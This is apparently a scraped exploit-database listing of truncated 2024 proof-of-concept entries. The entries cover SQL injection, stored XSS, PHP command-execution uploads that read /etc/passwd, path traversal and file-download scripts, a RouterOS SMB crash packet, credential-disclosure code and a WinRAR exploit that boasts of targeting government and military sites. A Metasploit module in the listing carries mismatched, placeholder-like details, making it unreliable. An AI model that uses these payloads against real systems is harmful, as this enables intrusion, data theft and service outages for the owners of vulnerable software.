?day POC 漏洞数据库

# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive…

# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injectio…

# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the…

# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can rea…

# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?> 4 ) After click install you will be see result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail ext…

Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum…

############################################# # Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation # Exploit Author: E1 Coders # CVE: CVE-2024-21338 ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', '…

# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name','middle_initial' ,'last_name'" in /receptionist.php component. # POC: 1. Go to the User Login page:…

# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameter in the profile component. # POC: 1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In fname & lname parameter add payolad "…

# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php 2. Now login with default username=mayuri.infosp…

# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (co…

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://github.com/opencart/opencart/releases # Version: 4.0.2.3 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=product/search&search=test - New…

# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-02 # Exploit Author: Alaa Kachouh # Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/ # Version: Up to 01.06.15 # Tested on: Windows # CVE: CVE-2024-27673 =================================================================== ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will inv…

# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.rapid7.com/ # Software Link: https://www.rapid7.com/products/nexpose/ # Version: 6.6.240 # Tested: Windows 10 x64 # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem # …

# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) # Google Dork: n/a # Date: 04/02/2024 # Exploit Author: Gian Paris C. Agsam # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip # Version: 1.0 # Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12 # CVE : n/a import requests import argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE requests.packages.urllib3.disable_warnings(requests.packages.urlli…

## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution ### Date: 2024-1-9 ### Exploit Author: tmrswrr ### Category: Webapps ### Vendor Homepage: https://livesite.com/ ### Version : 2019.1 ### Tested on: https://www.softaculous.com/apps/cms/liveSite 1 ) Login with admin cred Click Campaigns > Create Campaign > Choose format Plain Text , write in body your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php Payload : <?php echo system('cat /etc/passwd'); ?> 2 ) After save you will be see result : Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin …

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal # Date: 2024-03-06 # Exploit Author: Ven3xy # Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.10 # Tested on: Linux import sys import requests from urllib.parse import urljoin import time def exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and resp…

################################################################################################ # Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # Description : All target's GOV & Military websites # # # ################################################################################################ # # # Expl0iTs: # #include <stdio.h> #include <stdlib.h> #include <string.h> #include "zip.h" #define PDF_FILE "document.pdf" #define FOLDER_NAME "document.pdf\\" #define SCRIPT_FILE "script.bat" #define ZIP_FILE "expl…

# Exploit Title: [title] Dell Security Management Server versions prior to 11.9.0 # Exploit Author: [author] Amirhossein Bahramizadeh # CVE : [if applicable] CVE-2023-32479 Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking the reverse shell of the system leading to Privilege Escalation. #!/bin/bash INSTALL_DIR="/opt/dell" # Check if the installed directory has improper ACLs i…

# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS # Google Dork: N/A # Date: 03/04/2024 # Exploit Author: ice-wzl, Solstice Cyber Solutions # Vendor Homepage: https://mikrotik.com/ # Software Link: https://mikrotik.com/download/archive # Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # CVE : CVE-2024-27686 #!/usr/bin/python3 # Founded by ice-wzl in conjunction with Solstice Cyber Solutions import argparse import sys import socket # Define the packets # the packet that causes crash 6.40.5 - 6.42.3 fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x…

# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure # Date: 28-02-2024 # Exploit Author: semaja2 # Vendor Homepage: https://siklu.com/ # Software Link: https://partners.siklu.com/home/frontdoor # Version: < 2.0.0 # Tested on: 2.0.0 # CVE : None assigned # # Instructions # 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device # `ping6 -I en7 -c 2 ff02::1` # 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address # `ip -6 neigh show dev en7` # 3. Execute script # `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7` # 4. Enjoy the access import socket imp…

Exploit Title: Broken Access Control - on NodeBB v3.6.7 Date: 22/2/2024 Exploit Author: Vibhor Sharma Vendor Homepage: https://nodebb.org/ Version: 3.6.7 Description: I identified a broken access control vulnerability in nodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs res…

# Exploit Title: Purei CMS 1.0 - SQL Injection # Date: [27-03-2024] # Exploit Author: [Number 7] # Vendor Homepage: [purei.com] # Version: [1.0] # Tested on: [Linux] ____________________________________________________________________________________ Introduction: An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters. This could jeopardize the integrity of your database or reveal sensitive information. __________________________________________…

# Exploit Title: Workout Journal App 1.0 - Stored XSS # Date: 12.01.2024 # Exploit Author: MURAT CAGRI ALIS # Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html> # Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows / MacOS / Linux # CVE : CVE-2024-24050 # Description Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and L…